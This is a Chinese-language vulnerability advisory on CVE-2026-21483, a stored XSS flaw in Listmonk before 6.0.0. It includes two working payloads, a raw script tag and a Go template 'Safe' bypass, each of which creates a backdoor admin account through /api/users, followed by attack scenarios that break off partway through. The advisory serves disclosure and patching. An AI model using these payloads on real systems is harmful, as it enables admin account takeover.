Listmonk易受存储型XSS攻击CVE-2026-21483

摘要

栋科技漏洞库关注到 Listmonk 在版本6.0.0之前的版本存在安全漏洞，该漏洞现已被追踪为CVE-2026-21483，漏洞的CVSSS 4.0评分5.4。

Listmonk是独立的、自托管的新闻稿和邮件列表管理器，开箱即用，基于 Go 语言开发，MIT 许可证，无商业版限制，可完全私有化部署。

一、基本情况

Listmonk 是一款轻量但功能完备的自托管邮件营销系统，专为需要自主掌控邮件发送、无需依赖第三方 SaaS 平台（如 Mailchimp）场景。

Listmonk易受存储型XSS攻击CVE-2026-21483

Listmonk 开源、自托管的高性能邮件列表管理器与营销自动化工具，仅依赖 PostgreSQL 数据库，支持 Docker 一键部署，无复杂依赖链。

栋科技漏洞库关注到 Listmonk 在版本6.0.0之前的版本存在安全漏洞，该漏洞现已被追踪为CVE-2026-21483，漏洞的CVSSS 4.0评分5.4。

二、漏洞分析

CVE-2026-21483漏洞是 Listmonk 受影响版本中存在的一个易受存储型 XSS 攻击的安全漏洞，该安全漏洞可能会导致管理员帐户被接管。

该漏洞可能导致拥有活动管理权限的低权限用户可以在活动或模板中注入恶意JavaScript代码，目前，版本6.0.0已经解决了这一安全问题。

当高权限用户（超级管理员）查看或预览此内容时，XSS会在其浏览器上下文中执行，使攻击者可执行特权操作，如创建后门管理员账户。

该攻击可通过公共存档功能实现武器化，受害者只需访问一个链接即可，无需点击预览。

1、所需的攻击者权限

campaigns:manage    - Create/edit campaigns
campaigns:get       - View campaigns  
lists:get_all       - Access lists
templates:get       - Access templates

注意：这些是内容管理者（非完全管理员）的常见权限。

2、攻击向量

向量1：原始HTML（直接脚本标签）

<script>
fetch('/api/users', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  credentials: 'include',
  body: '{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'
});
</script>

向量2：Go语言模板安全函数

{{ `<script>fetch('/api/users',{method:'POST',headers:{'Content-Type':'application/json'},credentials:'include',body:'{"username":"backdoor","email":"backdoor@evil.com","name":"Backdoor","password":"Hacked123","type":"user","status":"enabled","userRoleId":1,"user_role_id":1}'});</script>` | Safe }}

3、攻击场景

场景1：活动预览攻击

攻击者使用XSS载荷创建攻击活动

向超级管理员提出请求：“Please review my newsletter draft”

超级管理员打开活动并点击“Preview”

XSS执行 → 后门管理员账户已创建

攻击者通过后门登录 backdoor / Hacked123

场景2：归档链接攻击（无需点击）

攻击者使用XSS载荷创建攻击活动

攻击者为该活动启用存档功能

攻击者分享存档链接：http://localhost:9000/archive/{uuid}

超级管理员访问该链接（无需点击预览！）